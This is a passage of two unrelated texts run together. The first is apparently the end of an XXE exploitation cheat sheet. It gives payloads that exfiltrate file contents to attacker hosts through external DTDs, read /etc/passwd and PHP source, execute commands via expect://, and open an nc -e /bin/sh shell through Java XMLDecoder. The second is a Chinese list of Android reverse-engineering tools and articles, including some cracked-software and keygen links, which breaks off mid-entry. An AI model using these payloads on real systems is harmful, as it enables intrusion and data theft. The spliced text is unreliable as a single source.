"&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]> <data> <env>&exfil;</env> </data> ``` DTD example: ```markup <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag"> <!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>"> %abt; %exfil; ``` ## PHP Wrappers ### Base64 **Extract** _**index.php**_ ```markup <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> ``` #### **Extract external resource** ```markup <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3"> ]> ``` ### Remote code execution **If PHP "expect" module is loaded** ```markup <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <creds> <user>&xxe;</user> <pass>mypass</pass> </creds> ``` ## **SOAP - XEE** ```markup <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> ``` ## XLIFF - XXE This section was taken from [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)\ According to the [Wikipedia](https://en.wikipedia.org/wiki/XLIFF): > XLIFF (XML Localization Interchange File Format) is an XML-based bitext format created to standardize the way localizable data are passed between and among tools during a localization process and a common format for CAT tool exchange. ### Blind request ```markup ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE XXE [ <!ENTITY % remote SYSTEM "http://redacted.burpcollaborator.net/?xxe_test"> %remote; ]> <xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` The server response with an error: ```javascript {"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."} ``` But we got a hit on Burp Collaborator. ### Exfiltrating Data via Out of Band ```markup ------WebKitFormBoundaryqBdAsEtYaBjTArl3 Content-Disposition: form-data; name="file"; filename="xxe.xliff" Content-Type: application/x-xliff+xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE XXE [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> <xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff> ------WebKitFormBoundaryqBdAsEtYaBjTArl3-- ``` Based on the displayed User Agent returned by burp collaborator, it appears that it is using **Java 1.8**. One of the problems when exploiting XXE on this version of Java is **we’re unable to obtain the files containing a `New Line`** such as `/etc/passwd` using the Out of Band technique. ### Exfiltrating Data via Error Based DTD File: ```markup <!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>"> %foo; %xxe; ``` Server Response: ```javascript {"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"} ``` Great! The `non-exist` file is reflected in the Error messages. Next is adding the File Content. DTD File: ```markup <!ENTITY % data SYSTEM "file:///etc/passwd"> <!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/%data;'>"> %foo; %xxe; ``` And the content of the file was successfully **printed in the output of the error sent via HTTP**. ## RSS - XEE Valid XML with RSS format to exploit an XXE vulnerability. ### Ping back Simple HTTP request to attackers server ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE title [ <!ELEMENT title ANY > <!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>XXE Test Blog</title> <link>http://example.com/</link> <description>XXE Test Blog</description> <lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate> <item> <title>&xxe;</title> <link>http://example.com</link> <description>Test Post</description> <author>[email protected]</author> <pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate> </item> </channel> </rss> ``` ### Read file ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE title [ <!ELEMENT title ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>The Blog</title> <link>http://example.com/</link> <description>A blog about things</description> <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> <item> <title>&xxe;</title> <link>http://example.com</link> <description>a post</description> <author>[email protected]</author> <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate> </item> </channel> </rss> ``` ### Read source code Using PHP base64 filter ```markup <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE title [ <!ELEMENT title ANY > <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >]> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>The Blog</title> <link>http://example.com/</link> <description>A blog about things</description> <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> <item> <title>&xxe;</title> <link>http://example.com</link> <description>a post</description> <author>[email protected]</author> <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate> </item> </channel> </rss> ``` ## Java XMLDecoder XEE to RCE XMLDecoder is a Java class that creates objects based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method **readObject**, he will instantly gain code execution on the server. ### Using Runtime().exec() ```markup <?xml version="1.0" encoding="UTF-8"?> <java version="1.7.0_21" class="java.beans.XMLDecoder"> <object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <array class="java.lang.String" length="6"> <void index="0"> <string>/usr/bin/nc</string> </void> <void index="1"> <string>-l</string> </void> <void index="2"> <string>-p</string> </void> <void index="3"> <string>9999</string> </void> <void index="4"> <string>-e</string> </void> <void index="5"> <string>/bin/sh</string> </void> </array> </void> </object> </java> ``` ### ProcessBuilder ```markup <?xml version="1.0" encoding="UTF-8"?> <java version="1.7.0_21" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="6"> <void index="0"> <string>/usr/bin/nc</string> </void> <void index="1"> <string>-l</string> </void> <void index="2"> <string>-p</string> </void> <void index="3"> <string>9999</string> </void> <void index="4"> <string>-e</string> </void> <void index="5"> <string>/bin/sh</string> </void> </array> <void method="start" id="process"> </void> </void> </java> ``` ## Tools {% embed url="https://github.com/luisfontes19/xxexploiter" %} ## More resources [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\ [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\ Extract info via HTTP using own external DTD: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\ [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\ [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\ [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\ [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\ [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7) <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details>
# [所有收集类项目](https://github.com/alphaSeclab/all-my-collection-repos) # Android - Android安全资源收集,初版。600+工具,1500+文章 - [English Version](https://github.com/alphaSeclab/android-security/blob/master/Readme_en.md) # 目录 - [资源收集](#68d90d74dca98b4812bd082767343703) - [(11) Github Repo](#767078c52aca04c452c095f49ad73956) - [知名分析工具](#d3edc24d146d61221786f8e89c902397) - [ClassyShark](#c52b14cea935b701a421cb2d44c590d3) -> [(3)工具](#4a8b5558129606951cf406d3717efc25) [(7)文章](#ebb31da97d52038330587e11aa3b7663) - [jeb](#98e0f17cd07a3cf1e8ffc43a6237ecc6) -> [(14)工具](#56d0739e51ee737ac2dc2000714eb920) [(50)文章](#3205cec7f053205545589f9b332a3708) - [enjarify](#190a50af2c6e312dab59310243dc9a07) -> [(2)工具](#1ab52c0bb8444157e2a6217c2c7a1783) [(1)文章](#a2e68c9be0b242e3fb4fd42a262c471a) - [androguard](#019813c8858057c3b079ba9fbda7e61f) -> [(5)工具](#57ab0c9888130e35c2fc37f97537fdd3) [(14)文章](#0d6b1003c6e834560d9860f77f10e6b1) - [jadx](#f136c28b41053e3d884385f33da22bb5) -> [(3)工具](#b36c7a8866ead5febf57b179811d6b35) [(3)文章](#bbf5db01b18fc4ceacd7d1bb6e456807) - [jd-gui](#51f8cd240758c6723fe59e5fb7b5a941) -> [(2)工具](#732953dd03c164baa82b5189a1e883bb) [(3)文章](#b1b9fcec9b1935d4a5373e9907d5d1bb) - [dex2jar](#d9716319ad6dac60048651a18e2b0a4b) -> [(5)工具](#541b58e9a1ee2bebf1295ae116fafa4d) [(2)文章](#32f4773a7e0739def1ab014fadb3db88) - [apktool](#6d92b271b2e90e8b03d873712722adbe) -> [(13)工具](#2f014ba4bc98fef37272a1e4acc399f2) [(40)文章](#8b6c1a37516d86d729d05ad769e5d681) - [virtualapk](#63bfb9519c279be953eca5c8f99757fa) -> [(1)工具](#66019021f5ace5c41bf5de20be94f9e3) - [baksmali](#40180b771f8762f1470aa38b19afc1e1) -> [(2)工具](#c762fd140130e8f90c51d58f3e01288a) [(4)文章](#f84bf9c4269ace64fe1a216046c67d62) - [cSploit](#3e5efcb723ddb311526b0cf27a095117) -> [(4)工具](#61012694dfaf7dc87ef7a0738a005818) [(4)文章](#47fbd63ae0e4321d98e09951fd37f1bb) - [bytecodeviewer](#6ad1dd69e315677a2252c1c8e8620572) -> [(2)工具](#26f401339eb01096e69d6c650abe51df) - [MobSF](#1ed0d3c6279ba30df06262de9c24cdd8) -> [(3)工具](#9c93b893f550d7c8cf4a19cce06e177b) [(6)文章](#9e5612f2c728bdbbca8b2571bd94cd79) - [androl4b](#eccb49e7c71be9df25fec6d241d18f8e) -> [(1)工具](#800724f7b844e2293370510700c6ca73) [(4)文章](#42ea2fc802be5efdd7bc656aa39446cb) - [decaf](#78c2fbcadbbfda5a1448c6f150a9251d) -> [(3)工具](#0c3c1ab3d169db8cc058a0d72cb6aa1d) [(4)文章](#9843fb6cfb113c357deaf0dac05b22a8) - [cuckoo-droid](#b32978986b1ad7ff33a1ff4ee968190c) -> [(1)工具](#1532c5ea999fcd785571a78ca3fed8f6) - [各类App](#a054356d9fb3b22c638a5c49406e230a) - [ahmyth](#51c70b0a90c17e4c3591c5997ffb1283) -> [(1)工具](#8192031d06c545c465a838c13002ef27) [(3)文章](#1d343a8e2abaf1bcdb2c7952fbab8ad1) - [(8) 工具](#1ab9ebcde9606f3e02a0dcd6c48411ad) - [Topic](#a3f24c3d0190fbd519cce450f423b86e) - [漏洞](#73b51525ab1548eba12f897ff482d785) -> [(79)工具](#d39d72e9362eda71cef10de260f43107) [(476)文章](#d5f45ceee87e1d68df9fe75801285e9e) - [恶意代码](#1e2d63c4b03a69a79a5543b4b0f395a7) -> [(43)工具](#9a60c82748643599d1c1a46dc183ab88) [(471)文章](#139ddb12762052da5ebe038c455162fa) - [取证](#fcb2e498f1a3378bf3e2dd5adda43e03) -> [(7)工具](#0cddb153bfea5b5abcf0f4a44be6ccc5) [(37)文章](#73a56c2788dc27af4f49cbf1811ee1e9) - [Hook](#70cd678f065f0cbd109b5fb665aed139) - [XPosed](#07c5aa963e1201a7c162ccb84ec1fb28) -> [(9)工具](#41ac1eb0f56af536a7aed91a6983e95f) [(8)文章](#dc6d6d158e806f4f9d02ed8b43c5c501) - [Frida](#7de48e67d0fc795c29ba29ea12c6db80) -> [(5)工具](#f70d1610a9446395aa5de9cae70b43c3) [(9)文章](#997a6a2140fc004cb639429adfb68ac7) - [(25) 工具](#4e9f32429486266721e7e21efa0ce727) - [(43) 文章](#c52fb5d0961a84619a88a875380554c1) - [加固&&破解](#df9d9982d70a9b99fdfc0c27bac60e12) -> - [其他](#c8cd36b0b75c53d7b4caa914f6dd2600) - [Dalvik](#5b17938e2cb613edbe566bc475877103) -> [(13)工具](#d1c1bf3368f35715c87fa697dc021d06) [(45)文章](#66b8d79829c4b1448d9ad702333097d8) - [APK-Xxx](#884f1a8ba4dc1bba9a0d7ecb748fd28c) -> [(94)工具](#a4b01e00010adcea40d99cd2047eed8b) - [ADB](#ef7dc42448191170a38b470d6df851fc) -> [(23)工具](#ade3cb4479c4d96476509d1d7b4584b8) [(61)文章](#0ad73dcc365a651ead2ea75d93c5be9b) - [IDA Pro](#92fdafffc262b0a0427a9f2e40203503) -> [(4)工具](#50fae763dd75614bc2f4390fba4925a3) [(7)文章](#f19c751a88ffad37105cdd3da817e70a) - [Frida](#ac4c5990ef8ae8de989ee9160684127b) -> [(24)工具](#5200b384a3876135b11fedf6f23496ce) [(29)文章](#f9fd19a349a4b18d553d0c4ec4865764) - [工具](#ea3c7c05861352ae1d05ce28cf745e7e) - [文章](#39226e999eb0a6673919aeea22921d0b) # <a id="68d90d74dca98b4812bd082767343703"></a>资源收集 *** ## <a id="767078c52aca04c452c095f49ad73956"></a>Github Repo - [**4411**星][3m] [Shell] [ashishb/android-security-awesome](https://github.com/ashishb/android-security-awesome) A collection of android security related resources - [**1673**星][3y] [Shell] [juude/droidreverse](https://github.com/juude/droidreverse) android 逆向工程工具集 - [**672**星][4m] [doridori/android-security-reference](https://github.com/doridori/android-security-reference) A W.I.P Android Security Ref - [**509**星][2y] [b-mueller/android_app_security_checklist](https://github.com/b-mueller/android_app_security_checklist) Android App Security Checklist - [**443**星][1m] [jnusimba/androidsecnotes](https://github.com/jnusimba/androidsecnotes) some learning notes about Android Security - [**135**星][2m] [C++] [chenenyu/androidsecurity](https://github.com/chenenyu/androidsecurity) Android安全实践 - [**98**星][4y] [Java] [zencodex/hack-android](https://github.com/zencodex/hack-android) Collection tools for hack android, java - [**79**星][11m] [wufengxue/android-reverse](https://github.com/wufengxue/android-reverse) 安卓逆向工具汇总 - [**74**星][3y] [wtsxdev/android-security-list](https://github.com/wtsxdev/android-security-list) Collection of Android security related resources - [**66**星][1y] [pfalcon/awesome-linux-android-hacking](https://github.com/pfalcon/awesome-linux-android-hacking) List of hints and Q&As to get most of your Linux/Android device - [**33**星][3y] [nextco/android-decompiler](https://github.com/nextco/android-decompiler) A hight quality list of tools to reverse engineering code from android. # <a id="d3edc24d146d61221786f8e89c902397"></a>知名分析工具 *** ## <a id="c52b14cea935b701a421cb2d44c590d3"></a>ClassyShark ### <a id="4a8b5558129606951cf406d3717efc25"></a>工具 - [**6164**星][5m] [Java] [google/android-classyshark](https://github.com/google/android-classyshark) 分析基于Android/Java的App或游戏 - [**189**星][3m] [borisf/classyshark-user-guide](https://github.com/borisf/classyshark-user-guide) Everything you want to know how to use ClassyShark - [**189**星][2y] [Kotlin] [borisf/classyshark-bytecode-viewer](https://github.com/borisf/classyshark-bytecode-viewer) Browse your Java/Kotlin compiled code ### <a id="ebb31da97d52038330587e11aa3b7663"></a>文章 - 2017.02 [BorisFarber] [Exporting types from Android app using ClassyShark](https://medium.com/p/7cd2be18cdf7) - 2016.11 [BorisFarber] [ClassyShark Product Docs](https://medium.com/p/6ad01bbdb9eb) - 2016.11 [BorisFarber] [Exporting data from ClassyShark](https://medium.com/p/e3cf3fe3fab8) - 2016.11 [BorisFarber] [APK Dashboard in ClassyShark](https://medium.com/p/9346318bf5c6) - 2016.01 [freebuf] [ClassyShark:轻便的安卓可执行文件浏览器](http://www.freebuf.com/sectool/92655.html) - 2015.12 [BorisFarber] [ClassyShark supports native code browsing](https://medium.com/p/a4985e7126b1) - 2015.12 [BorisFarber] [Welcome ClassyShark](https://medium.com/p/b632ae8488b4) *** ## <a id="98e0f17cd07a3cf1e8ffc43a6237ecc6"></a>jeb ### <a id="56d0739e51ee737ac2dc2000714eb920"></a>工具 - [**93**星][2m] [Py] [pnfsoftware/jeb2-samplecode](https://github.com/pnfsoftware/jeb2-samplecode) Sample extensions for JEB Decompiler - [**78**星][4y] [Java] [enovella/jebscripts](https://github.com/enovella/jebscripts) A set of JEB Python/Java scripts for reverse engineering Android obfuscated code - [**69**星][6m] [Py] [hamz-a/jeb2frida](https://github.com/hamz-a/jeb2frida) Automated Frida hook generation with JEB - [**58**星][1m] [Java] [pnfsoftware/jeb2-androsig](https://github.com/pnfsoftware/jeb2-androsig) Android Library Code Recognition - [**38**星][10m] [Java] [pnfsoftware/jnihelper](https://github.com/pnfsoftware/jnihelper) jeb-plugin-android-jni-helper - [**37**星][3m] [Py] [pnfsoftware/jeb-golang-analyzer](https://github.com/pnfsoftware/jeb-golang-analyzer) JEB scripts for Golang executables analysis - [**34**星][9m] [Py] [idhyt/jeb-keygen](https://github.com/idhyt/jeb-keygen) JEB install env - [**30**星][10m] [Java] [pnfsoftware/jeb2-plugin-oat](https://github.com/pnfsoftware/jeb2-plugin-oat) Android OAT Plugin for JEB - [**20**星][2y] [Java] [pnfsoftware/pleaserop](https://github.com/pnfsoftware/pleaserop) Architecture-agnostic ROP gadget finder using JEB's IR - [**19**星][9m] [Java] [pnfsoftware/jeb-plugin-libra](https://github.com/pnfsoftware/jeb-plugin-libra) Libra decompiler plugin for JEB - [**13**星][1y] [Java] [pnfsoftware/jeb2-andhook](https://github.com/pnfsoftware/jeb2-andhook) - [**5**星][1y] [Java] [pnfsoftware/jeb-native-ir-optimizer-example1](https://github.com/pnfsoftware/jeb-native-ir-optimizer-example1) - [**5**星][10m] [Java] [pnfsoftware/jeb2-plugin-pdf](https://github.com/pnfsoftware/jeb2-plugin-pdf) PDF Analyzer Plugin for JEB - [**1**星][3y] [Java] [pnfsoftware/jeb2-plugin-avqu](https://github.com/pnfsoftware/jeb2-plugin-avqu) JEB Plugin Extractor for Anti-Virus Quarantine files ### <a id="3205cec7f053205545589f9b332a3708"></a>文章 - 2020.02 [pnfsoftware] [JEB Android Updates – Lambda Recovery, Unreflecting Code, Generic String Decryption, and More](https://www.pnfsoftware.com/blog/jeb-lambda-recovery-and-generic-string-decryption/) - 2019.10 [securify] [Automated Frida hook generation with JEB](https://www.securify.nl/en/blog/SFY20191006/automated-frida-hook-generation-with-jeb.html) - 2019.01 [pnfsoftware] [JEB Native Analysis Pipeline – Part 2: IR Optimizers](https://www.pnfsoftware.com/blog/jeb-native-pipeline-ir-optimizers-part-2/) - 2019.01 [pnfsoftware] [JEB 3.1 and JEB Home Edition x86](https://www.pnfsoftware.com/blog/jeb3-release-and-jeb-home-edition-x86/) - 2019.01 [pnfsoftware] [JEB Native Analysis Pipeline – Part 1: Intermediate Representation](https://www.pnfsoftware.com/blog/jeb-native-pipeline-intermediate-representation/) - 2018.11 [pediy] [[原创] 如何优雅的延长JEB demo的有效期](https://bbs.pediy.com/thread-247935.htm) - 2018.09 [pnfsoftware] [JEB3 Auto-Signing Mode](https://www.pnfsoftware.com/blog/jeb3-auto-signing-mode/) - 2018.05 [pediy] [[原创]JEB2反混淆神器](https://bbs.pediy.com/thread-227046.htm) - 2018.05 [pnfsoftware] [JEB 3 Alpha is available](https://www.pnfsoftware.com/blog/jeb3-alpha-is-available/) - 2018.02 [pnfsoftware] [DEX Version 39, Dalvik and ART Opcode Overlaps, and JEB 2.3.11](https://www.pnfsoftware.com/blog/dex-version-39-new-dalvik-opcodes/) - 2017.11 [pediy] [[原创]java应用破解之破解 jeb mips 2.3.3](https://bbs.pediy.com/thread-222503.htm) - 2017.10 [pnfsoftware] [JEB 恶意软件分享平台](https://www.pnfsoftware.com/blog/introducing-the-jeb-malware-sharing-network/) - 2017.10 [pnfsoftware] [DEX and APK Updates in JEB 2.3.5](https://www.pnfsoftware.com/blog/dex-and-apk-updates-in-jeb-2-3-5/) - 2017.09 [flanker017] [JEB2插件教程之一](https://blog.flanker017.me/writing-jeb2-plugin/) - 2017.09 [aliyun] [编写自己的JEB2插件](https://xz.aliyun.com/t/46) - 2017.09 [360] [以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用(Part 1)](https://www.anquanke.com/post/id/86747/) - 2017.08 [pnfsoftware] [Firmware exploitation with JEB part 3: Reversing the SmartRG’s sr505n](https://www.pnfsoftware.com/blog/firmware-exploitation-with-jeb-part-3-reversing-the-smartrgs-sr505n/) - 2017.08 [4hou] [以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用](http://www.4hou.com/technology/7382.html) - 2017.08 [pnfsoftware] [如何利用 JEB 的 MIPS 反编译器来挖掘和利用嵌入式设备的软件漏洞](https://www.pnfsoftware.com/blog/firmware-exploitation-with-jeb-part-2/) - 2017.08 [pnfsoftware] [如何利用 JEB 的 MIPS 反编译器来挖掘和利用嵌入式设备的软件漏洞](https://www.pnfsoftware.com/blog/firmware-exploitation-with-jeb-part-1/) - 2017.06 [pediy] [[原创] JEB2插件,导出APK资源文件](https://bbs.pediy.com/thread-218302.htm) - 2017.05 [pnfsoftware] [JEB 2.3 and MIPS Decompilation](https://www.pnfsoftware.com/blog/jeb-mips-decompilation/) - 2017.04 [pnfsoftware] [Analyzing a New MIPS IoT Malware With JEB](https://www.pnfsoftware.com/blog/analyzing-mips-iot-malware-with-jeb/) - 2016.09 [pnfsoftware] [Library Code Matching for Android with JEB](https://www.pnfsoftware.com/blog/jeb-library-code-matching-for-android/) - 2016.08 [pediy] [[下载]jeb2.2.5 破解版](https://bbs.pediy.com/thread-212332.htm) - 2016.03 [pnfsoftware] [An introduction to JEB Android Debuggers](https://www.pnfsoftware.com/blog/jeb-android-debuggers/) - 2016.02 [pnfsoftware] [User interface how-to in JEB](https://www.pnfsoftware.com/blog/jeb-ui-how-to/) - 2015.12 [pnfsoftware] [Changes in JEB 2.1… And a holiday season gift](https://www.pnfsoftware.com/blog/what-s-new-in-jeb-2-1/) - 2015.12 [pnfsoftware] [Scanning PDF Files using JEB2](https://www.pnfsoftware.com/blog/scanning-pdf-files-using-jeb2/) - 2015.11 [pnfsoftware] [Writing client scripts for JEB2 using Python](https://www.pnfsoftware.com/blog/writing-jeb2-scripts-in-python/) - 2015.10 [pnfsoftware] [Developing JEB2 parsers and plugins](https://www.pnfsoftware.com/blog/developing-jeb2-plugins/) - 2015.09 [pnfsoftware] [Setting up JEB2 to parse optimized DEX (odex) files](https://www.pnfsoftware.com/blog/setting-up-jeb2-to-parse-odex-files/) - 2015.09 [pnfsoftware] [JEB2 introduction videos](https://www.pnfsoftware.com/blog/jeb2-introduction-videos/) - 2015.08 [pnfsoftware] [JEB2 available to all customers](https://www.pnfsoftware.com/blog/jeb2-available-to-all-customers/) - 2015.07 [pediy] [[分享]JEB 1.5.201408040(full) 补充全平台keygen](https://bbs.pediy.com/thread-202840.htm) - 2015.07 [pediy] [JEB 1.5.201408040(full) + keygen](https://bbs.pediy.com/thread-202793.htm) - 2015.07 [pnfsoftware] [JEB2 plugins for document formats](https://www.pnfsoftware.com/blog/jeb2-plugins/) - 2015.06 [flanker017] [Advanced Android Application Analysis Series – JEB API Manual and Plugin Writing](https://blog.flanker017.me/advanced-android-application-analysis-jeb-api-manual-and-plugin-writing/) - 2015.06 [pnfsoftware] [What is changing with JEB2](https://www.pnfsoftware.com/blog/what-is-changing-with-jeb2/) - 2015.06 [pnfsoftware] [Announcing JEB2](https://www.pnfsoftware.com/blog/announcing-jeb2/) - 2014.08 [pnfsoftware] [JEB Jar Plugins](https://www.pnfsoftware.com/blog/jeb-jar-plugins/) - 2014.07 [pediy] [用Javassis分析jeb.jar](https://bbs.pediy.com/thread-190642.htm) - 2014.07 [pediy] [JEB(破解更新2014-07-16)](https://bbs.pediy.com/thread-189980.htm) - 2014.03 [pnfsoftware] [Developing JEB plugins in Java with Eclipse](https://www.pnfsoftware.com/blog/developing-jeb-plugins-in-java-with-eclipse/) - 2013.09 [pnfsoftware] [Decompiled Java Code Manipulation using JEB API – Part 3: Defeating Reflection](https://www.pnfsoftware.com/blog/decompiled-java-code-manipulation-using-jeb-api-part-3-defeating-reflection/) - 2013.09 [pnfsoftware] [Decompiled Java Code Manipulation using JEB API – Part 2: Decrypting Strings](https://www.pnfsoftware.com/blog/decompiled-java-code-manipulation-using-jeb-api-part-2-decrypting-strings/) - 2013.09 [pnfsoftware] [Decompiled Java Code Manipulation using JEB API – Part 1: Removing Junk Code](https://www.pnfsoftware.com/blog/decompiled-java-code-manipulation-using-jeb-api-part-1-removing-junk-code/) - 2013.08 [pnfsoftware] [JEB Plugin How-To: Jump to an Activity](https://www.pnfsoftware.com/blog/jeb-plugin-how-to-jump-to-an-activity/) - 2013.07 [pnfsoftware] [JEB 1.3: How to Sign and Match Third-Party Library Code](https://www.pnfsoftware.com/blog/jeb-1-3-how-to-sign-and-match-third-party-library-code/) - 2013.05 [pnfsoftware] [JEB’s decompiled sources for Android/BadNews.A](https://www.pnfsoftware.com/blog/jebs-decompiled-sources-for-androidbadnews-a/) *** ## <a id="190a50af2c6e312dab59310243dc9a07"></a>enjarify ### <a id="1ab52c0bb8444157e2a6217c2c7a1783"></a>工具 - [**2467**星][3y] [Py] [google/enjarify](https://github.com/google/enjarify) 将Dalvik字节码转换为对应的Java字节码 - [**516**星][5m] [Py] [storyyeller/enjarify](https://github.com/storyyeller/enjarify) 将Dalvik字节码转为对应的Java字节码(google Fork版) ### <a id="a2e68c9be0b242e3fb4fd42a262c471a"></a>文章 - 2015.10 [Roland] [Google自己出品的dex转jar工具enjarify的介绍](https://blog.csdn.net/Roland_Sun/article/details/49274307) *** ## <a id="019813c8858057c3b079ba9fbda7e61f"></a>androguard ### <a id="57ab0c9888130e35c2fc37f97537fdd3"></a>工具 - [**2890**星][3m] [Py] [androguard/androguard](https://github.com/androguard/androguard) Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - [**60**星][2y] [C] [koodous/androguard-yara](https://github.com/koodous/androguard-yara) Module to use Androguard with Yara - [**57**星][1y] [Py] [programa-stic/marvin-static-analyzer](https://github.com/programa-stic/marvin-static-analyzer) Marvin static analyzer is an Android application vulnerability scanner. The framework uses androguard and Static Android Analysis Framework (SAAF). - [**32**星][2y] [dweinstein/dockerfile-androguard](https://github.com/dweinstein/dockerfile-androguard) docker file for use with androguard python android app analysis tool - [**2**星][2y] [h4ng3r/r2dextest](https://github.com/h4ng3r/r2dextest) Dalvik tests generator for radare2 using on androguard ### <a id="0d6b1003c6e834560d9860f77f10e6b1"></a>文章 - 2018.04 [infosecinstitute] [Android Penetration Tools Walkthrough Series: Androguard](http://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-androguard/) - 2016.09 [venus] [Androguard补完计划——锁定字符串解密函数](https://paper.seebug.org/43/) - 2016.09 [venus] [Androguard补完计划——提取加密字符串](https://paper.seebug.org/40/) - 2015.10 [angelalonso] [Malware Analysis with Androguard: a practical case](http://blog.angelalonso.es/2015/10/malware-analysis-with-androguad.html) - 2015.10 [spreitzenbarth] [Androguard: A simple step by step guide](https://forensics.spreitzenbarth.de/2015/10/05/androguard-a-simple-step-by-step-guide/) - 2014.11 [k3170makan] [Automated DEX Decompilation using Androguard part II: Dex2Java](http://blog.k3170makan.com/2014/11/automated-dex-decompilation-using_23.html) - 2014.11 [k3170makan] [Automated DEX Decompilation using Androguard](http://blog.k3170makan.com/2014/11/automated-dex-decompilation-using.html) - 2014.09 [pentestcorner] [Androguard plugin for Sublime Text: Installation and 